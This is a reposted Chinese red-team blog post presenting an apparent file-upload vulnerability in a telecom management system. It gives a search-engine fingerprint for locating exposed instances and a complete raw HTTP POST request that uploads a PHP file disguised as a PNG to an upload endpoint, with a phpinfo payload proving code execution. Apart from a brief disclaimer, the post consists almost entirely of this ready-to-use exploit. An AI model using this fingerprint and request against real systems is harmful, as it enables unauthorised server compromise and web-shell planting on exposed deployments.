推荐点击下面图片,通过本站淘宝优惠价购买:
0x01 阅读须知
红队01的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的信息仅用于学习,禁止用于其他!!!
0x02 漏洞复现
鹰图指纹:
web.body="img/lo1gin_bg3.png"&&web.body="系统登录"
POST /manager/teletext/material/upload.php HTTP/1.1Host: xxx.xxx.xxx.xxx:xxxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en;q=0.6Cookie: PHPSESSID=vsdl33qjn3fbslu7k3r99di5n3Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Length: 786------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="fileToUpload"; filename="1.php"Content-Type: image/png<?php phpinfo();?>------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="type"img------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="w"1280------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="h"720------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="userid"10003xx------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="appid"5------WebKitFormBoundaryB33cDIYAxIrc9MsSContent-Disposition: form-data; name="uploadtime"20230603_231117_168580xxxxxx------WebKitFormBoundaryB33cDIYAxIrc9MsS--
原文始发于微信公众号(红队01):电信某系统爆炸核弹级0day
本文链接:https://hqyman.cn/post/4296.html 非本站原创文章欢迎转载,原创文章需保留本站地址!
休息一下,本站随机推荐观看栏目:
